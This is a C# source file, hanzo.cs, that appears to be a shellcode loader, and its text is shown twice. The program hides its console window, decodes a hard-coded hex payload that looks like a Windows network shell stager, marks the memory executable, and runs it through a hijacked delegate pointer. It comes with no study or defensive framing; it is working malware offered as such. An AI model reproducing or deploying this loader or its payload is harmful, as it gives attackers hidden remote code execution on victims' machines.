/hanzo.cs

## hanzo.cs
using System;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
using System.Globalization;
using System.IO;
using System.Net;
using System.Linq;
using System.Diagnostics;
using System.Threading;
using System.Xml;
namespace ExploitShellcodeExec
{
    class Program
    {
        [DllImport("kernel32.dll", SetLastError = true)]
        //[DllImport("kernel32.dll")]
        static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, uint flNewProtect, out uint lpflOldProtect);
        public delegate uint Ret1ArgDelegate(uint address);
        static uint PlaceHolder1(uint arg1) { return 0; }
        [DllImport("kernel32.dll")]
        static extern IntPtr GetConsoleWindow();

        [DllImport("user32.dll")]
        static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);

        const int SW_HIDE = 0;
        const int SW_SHOW = 5;
        public static byte[] lerpayload(string nome_arquivo)
        {
            using (Stream meu_arquivo = new FileStream(Environment.CurrentDirectory + "/" +nome_arquivo,
           FileMode.Open))
            {
                var tamanho = meu_arquivo.Length;
                var byteshexa = new byte[tamanho];
                meu_arquivo.Read(byteshexa, 0, (int)tamanho);
                return byteshexa;
            }
        }

        unsafe static void Main(string[] args)
        {
            var handle = GetConsoleWindow();

            // Hide
            ShowWindow(handle, SW_HIDE);
            string hexaBinpayload = "FCE8820000006089E531C0648B50308B520C8B52148B72280FB74A2631FFAC3C617C022C20C1CF0D01C7E2F252578B52108B4A3C8B4C1178E34801D1518B592001D38B4918E33A498B348B01D631FFACC1CF0D01C738E075F6037DF83B7D2475E4588B582401D3668B0C4B8B581C01D38B048B01D0894424245B5B61595A51FFE05F5F5A8B12EB8D5D6833320000687773325F54684C772607FFD5B89001000029C454506829806B00FFD56A0568B3331DC4680200115C89E6505050504050405068EA0FDFE0FFD5976A1056576899A57461FFD585C0740AFF4E0875ECE8610000006A006A0456576802D9C85FFFD583F8007E368B366A406800100000566A006858A453E5FFD593536A005653576802D9C85FFFD583F8007D225868004000006A0050680B2F0F30FFD55768756E4D61FFD55E5EFF0C24E971FFFFFF01C329C675C7C3BBF0B5A2566A0053FFD5";
            byte[] shellcodehex = HexStringToByteArray(hexaBinpayload);
            Console.WriteLine("excutando...");
            executar(shellcodehex);
        }

         public static byte[] HexStringToByteArray(string Hex)
        {
            byte[] Bytes = new byte[Hex.Length / 2];
            int[] valores = new int[] { 0x00, 0x01, 0x02, 0x03, 0x04, 0x05,
       0x06, 0x07, 0x08, 0x09, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
       0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F };

            for (int x = 0, i = 0; i < Hex.Length; i += 2, x += 1)
            {
                Bytes[x] = (byte)(valores[Char.ToUpper(Hex[i + 0]) - '0'] << 4 |
                                  valores[Char.ToUpper(Hex[i + 1]) - '0']);
            }

            return Bytes;
        }

        unsafe public static void executar(byte[] asmBytes)
        {
            fixed (byte* startAddress = &asmBytes[0])
            {
                // pegando feildinfo do método "_methodPtr"
                Type delType = typeof(Delegate);
                FieldInfo _methodPtr = delType.GetField("_methodPtr", BindingFlags.NonPublic |
               BindingFlags.Instance);
                // ret delegaete
                Ret1ArgDelegate del = new Ret1ArgDelegate(PlaceHolder1);
                _methodPtr.SetValue(del, (IntPtr)startAddress);
                //desabilitar a proteção
                uint outOldProtection;
                VirtualProtect((IntPtr)startAddress, (uint)asmBytes.Length, 0x40, out outOldProtection);
                // exetutar shellcode
                uint n = (uint)0x00000001;
                n = del(n);
                Console.WriteLine("{0:x}", n);
                Console.ReadKey();
            }

        }
    }
}
/*dWludCBvdXRPbGRQcm90ZWN0aW9uOw0KICAgICAgICAgICAgICAgIFZpcnR1YWxQcm90ZWN0KChJbnRQdHIpc3RhcnRBZGRyZXNzLCAodWludClhc21CeXRlcy5MZW5ndGgsIDB4NDAsIG91dCBvdXRPbGRQcm90ZWN0aW9uKTsNCiAgICAgICAgICAgICAgICAvLyBleGV0dXRhciBzaGVsbGNvZGUNCiAgICAgICAgICAgICAgICB1aW50IG4gPSAodWludCkweDAwMDAwMDAxOw0KICAgICAgICAgICAgICAgIG4gPSBkZWwobik7DQogICAgICAgICAgICAgICAgQ29uc29sZS5Xcml0ZUxpbmUoInswOnh9Iiwgbik7DQogICAgICAgICAgICAgICAgQ29uc29sZS5SZWFkS2V5KCk7DQogICAgICAgICAgICB9DQoNCiAgICAgICAgfQ0KICAgIH0NCn0=*/
	using System;
	using System.Reflection;
	using System.Runtime.InteropServices;
	using System.Text;
	using System.Globalization;
	using System.IO;
	using System.Net;
	using System.Linq;
	using System.Diagnostics;
	using System.Threading;
	using System.Xml;
	namespace ExploitShellcodeExec
	{
	class Program
	{
	[DllImport("kernel32.dll", SetLastError = true)]
	//[DllImport("kernel32.dll")]
	static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, uint flNewProtect, out uint lpflOldProtect);
	public delegate uint Ret1ArgDelegate(uint address);
	static uint PlaceHolder1(uint arg1) { return 0; }
	[DllImport("kernel32.dll")]
	static extern IntPtr GetConsoleWindow();

	[DllImport("user32.dll")]
	static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);

	const int SW_HIDE = 0;
	const int SW_SHOW = 5;
	public static byte[] lerpayload(string nome_arquivo)
	{
	using (Stream meu_arquivo = new FileStream(Environment.CurrentDirectory + "/" +nome_arquivo,
	FileMode.Open))
	{
	var tamanho = meu_arquivo.Length;
	var byteshexa = new byte[tamanho];
	meu_arquivo.Read(byteshexa, 0, (int)tamanho);
	return byteshexa;
	}
	}

	unsafe static void Main(string[] args)
	{
	var handle = GetConsoleWindow();

	// Hide
	ShowWindow(handle, SW_HIDE);
	string hexaBinpayload = "FCE8820000006089E531C0648B50308B520C8B52148B72280FB74A2631FFAC3C617C022C20C1CF0D01C7E2F252578B52108B4A3C8B4C1178E34801D1518B592001D38B4918E33A498B348B01D631FFACC1CF0D01C738E075F6037DF83B7D2475E4588B582401D3668B0C4B8B581C01D38B048B01D0894424245B5B61595A51FFE05F5F5A8B12EB8D5D6833320000687773325F54684C772607FFD5B89001000029C454506829806B00FFD56A0568B3331DC4680200115C89E6505050504050405068EA0FDFE0FFD5976A1056576899A57461FFD585C0740AFF4E0875ECE8610000006A006A0456576802D9C85FFFD583F8007E368B366A406800100000566A006858A453E5FFD593536A005653576802D9C85FFFD583F8007D225868004000006A0050680B2F0F30FFD55768756E4D61FFD55E5EFF0C24E971FFFFFF01C329C675C7C3BBF0B5A2566A0053FFD5";
	byte[] shellcodehex = HexStringToByteArray(hexaBinpayload);
	Console.WriteLine("excutando...");
	executar(shellcodehex);
	}

	public static byte[] HexStringToByteArray(string Hex)
	{
	byte[] Bytes = new byte[Hex.Length / 2];
	int[] valores = new int[] { 0x00, 0x01, 0x02, 0x03, 0x04, 0x05,
	0x06, 0x07, 0x08, 0x09, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F };

	for (int x = 0, i = 0; i < Hex.Length; i += 2, x += 1)
	{
	Bytes[x] = (byte)(valores[Char.ToUpper(Hex[i + 0]) - '0'] << 4 \|
	valores[Char.ToUpper(Hex[i + 1]) - '0']);
	}

	return Bytes;
	}

	unsafe public static void executar(byte[] asmBytes)
	{
	fixed (byte* startAddress = &asmBytes[0])
	{
	// pegando feildinfo do método "_methodPtr"
	Type delType = typeof(Delegate);
	FieldInfo _methodPtr = delType.GetField("_methodPtr", BindingFlags.NonPublic \|
	BindingFlags.Instance);
	// ret delegaete
	Ret1ArgDelegate del = new Ret1ArgDelegate(PlaceHolder1);
	_methodPtr.SetValue(del, (IntPtr)startAddress);
	//desabilitar a proteção
	uint outOldProtection;
	VirtualProtect((IntPtr)startAddress, (uint)asmBytes.Length, 0x40, out outOldProtection);
	// exetutar shellcode
	uint n = (uint)0x00000001;
	n = del(n);
	Console.WriteLine("{0:x}", n);
	Console.ReadKey();
	}

	}
	}
	}
	/dWludCBvdXRPbGRQcm90ZWN0aW9uOw0KICAgICAgICAgICAgICAgIFZpcnR1YWxQcm90ZWN0KChJbnRQdHIpc3RhcnRBZGRyZXNzLCAodWludClhc21CeXRlcy5MZW5ndGgsIDB4NDAsIG91dCBvdXRPbGRQcm90ZWN0aW9uKTsNCiAgICAgICAgICAgICAgICAvLyBleGV0dXRhciBzaGVsbGNvZGUNCiAgICAgICAgICAgICAgICB1aW50IG4gPSAodWludCkweDAwMDAwMDAxOw0KICAgICAgICAgICAgICAgIG4gPSBkZWwobik7DQogICAgICAgICAgICAgICAgQ29uc29sZS5Xcml0ZUxpbmUoInswOnh9Iiwgbik7DQogICAgICAgICAgICAgICAgQ29uc29sZS5SZWFkS2V5KCk7DQogICAgICAgICAgICB9DQoNCiAgICAgICAgfQ0KICAgIH0NCn0=/